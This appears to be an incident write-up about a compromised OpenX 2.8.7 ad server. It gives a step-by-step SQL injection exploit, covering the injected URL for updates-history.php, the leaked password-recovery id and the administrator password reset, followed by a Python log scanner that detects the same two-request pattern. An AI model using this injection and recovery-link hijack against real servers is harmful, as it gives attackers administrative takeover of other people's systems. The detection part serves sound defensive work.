My team and I spent a couple of hours today tracking down how our OpenX ad server had been exploited. We are running 2.8.7 and can't wait to roll out OpenX Enterprise.
Step 1: Send a GET request as per the sample below.
http:// ads.yoursite.com/openx/www/admin/updates-history.php?xajax=expandOSURow&xajaxargs=9999%20union%20select%201,2,3,4,5,6,7,8,concat%288894389893459,0x3A,user_type,0x3A,recovery_id,0x3A,user_id%29%20as%20tablename_backup,10,11,12%20from%20ox_password_recovery--%20
URL-decoded, the xajaxargs value that should be a bare numeric row id is the injected query `9999 union select 1,2,3,4,5,6,7,8,concat(8894389893459,0x3A,user_type,0x3A,recovery_id,0x3A,user_id) as tablename_backup,10,11,12 from ox_password_recovery-- `; the constant 8894389893459 is only a marker so the row is easy to spot in the output, and the 0x3A values are colons separating the fields.
Note that at the time our tables used the ox_ prefix; adjust the table name in the query if your install uses a different prefix.
Step 2: The response contains a table similar to the one below. Because this is an xajax call, it may come back as an XML string rather than rendered HTML, so you may have to read the values out of the markup. If the table is empty, there is no pending row in ox_password_recovery to hijack.
| Table origin | Backup table | Size | Rows |
|---|---|---|---|
| 8894389893459:user:D503-SOME-STRING-HERE:1 | 10 | 0 kb | |
| Total | 1 tables | 0 kb | 0 |
Step 3: Take the recovery id from the first column above (the `D503-SOME-STRING-HERE` part of `user:D503-SOME-STRING-HERE:1`, originally highlighted in red) and append it to the following URL.
http:// ads.yoursite.com/openx/www/admin/password-recovery.php?id=D503-SOME-STRING-HERE
Step 4: Set a new password. The recovery link belongs to the account with user_id 1, the OpenX administrator, so you now have full administrative access to the install.
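Since the point of the afternoon was working out from the logs how the box had been taken, here is the check we would have wanted to run over the access log. It is an added example, not code from the original post or from OpenX: it parses Apache combined-log lines, URL-decodes the xajaxargs parameter sent to updates-history.php (which for expandOSURow should be a bare numeric id), flags any value that decodes to SQL syntax, and then pairs each such probe with a later password-recovery.php?id= visit from the same address, which is exactly the two-request pattern in Steps 1 and 3. The log lines are constructed samples, and the IP addresses, timestamps and paths are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed sample Apache combined-log lines (not real traffic).
# Lines 1-2 reproduce the probe + recovery-link pattern from the post;
# lines 3-4 are benign uses of the same two scripts and must not match.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Jul/2011:10:01:02 +0000] "GET /openx/www/admin/updates-history.php?xajax=expandOSURow&xajaxargs=9999%20union%20select%201,2,3,4,5,6,7,8,concat%288894389893459,0x3A,user_type,0x3A,recovery_id,0x3A,user_id%29%20as%20tablename_backup,10,11,12%20from%20ox_password_recovery--%20 HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Jul/2011:10:01:09 +0000] "GET /openx/www/admin/password-recovery.php?id=D503-SOME-STRING-HERE HTTP/1.1" 200 2345 "-" "Mozilla/5.0"
198.51.100.4 - - [12/Jul/2011:10:05:00 +0000] "GET /openx/www/admin/updates-history.php?xajax=expandOSURow&xajaxargs=3 HTTP/1.1" 200 987 "-" "Mozilla/5.0"
198.51.100.4 - - [12/Jul/2011:10:06:00 +0000] "POST /openx/www/admin/password-recovery.php HTTP/1.1" 200 2345 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# A legitimate expandOSURow call carries a numeric row id only; any of these
# tokens in the decoded value means someone is injecting SQL.
SQL_TOKENS = re.compile(r'\b(union|select|concat|from)\b|--|/\*', re.IGNORECASE)


def decode_xajaxargs(target):
    """Return the URL-decoded xajaxargs value(s) from a request target."""
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    # xajax may send the argument either as xajaxargs=... or xajaxargs[]=...
    return params.get("xajaxargs", []) + params.get("xajaxargs[]", [])


def is_sqli_probe(target):
    """True if this is an updates-history.php request whose xajaxargs decodes to SQL."""
    if not urlsplit(target).path.endswith("/updates-history.php"):
        return False
    return any(SQL_TOKENS.search(value) for value in decode_xajaxargs(target))


def recovery_id(target):
    """Recovery id used on password-recovery.php, or None for other requests."""
    parts = urlsplit(target)
    if not parts.path.endswith("/password-recovery.php"):
        return None
    ids = parse_qs(parts.query).get("id")
    return ids[0] if ids else None


def find_hijacks(log_text):
    """Pair each SQL injection probe with later recovery-link visits from the same IP."""
    probes = defaultdict(list)  # ip -> decoded payloads seen so far
    hijacks = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip malformed lines rather than abort the scan
        ip, target = m["ip"], m["target"]
        if is_sqli_probe(target):
            probes[ip].extend(decode_xajaxargs(target))
            continue
        rid = recovery_id(target)
        if rid and ip in probes:
            hijacks.append({"ip": ip, "time": m["ts"], "recovery_id": rid,
                            "payload": probes[ip][-1]})
    return hijacks


if __name__ == "__main__":
    for h in find_hijacks(SAMPLE_LOG):
        print(f"{h['ip']} at {h['time']} used recovery id {h['recovery_id']}")
        print("  injected:", h["payload"])
```

Run it against the real access log by replacing SAMPLE_LOG with the file contents; a hit gives you the attacker's address, the moment the recovery link was used, and the decoded query, which is enough to know which account to reset and which recovery id to invalidate.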